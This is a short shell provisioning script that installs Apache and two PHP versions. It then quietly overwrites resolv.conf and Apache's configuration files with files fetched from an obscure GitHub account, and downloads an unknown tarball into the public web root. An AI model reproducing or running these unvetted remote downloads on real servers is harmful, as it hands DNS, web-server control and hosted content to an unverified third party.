apt-get update

apt-get install sudo -y

usermod -aG sudo root

apt-get install -y apache2

apt-get install -y php7.4

apt-get install -y php7.4-gmp

apt-get install -y software-properties-common

add-apt-repository ppa:ondrej/php -y

apt-get update

apt-get install -y php5.6

chmod 600 -R ./root

wget -q -N https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/resolv.conf

cd /etc/apache2/

wget -q -N https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/ports.conf

wget -q -N https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/apache2.conf

cd /etc/apache2/sites-enabled/

wget -q -N https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/000-default.conf

service apache2 restart

cd /var/www/html/

wget -N https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/linux8444.tar.gz
